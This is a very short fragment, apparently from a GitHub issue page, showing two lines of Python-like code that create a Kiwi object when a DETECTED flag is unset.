if not DETECTED:
wikith = Kiwi()
`
The text was updated successfully, but these errors were encountered: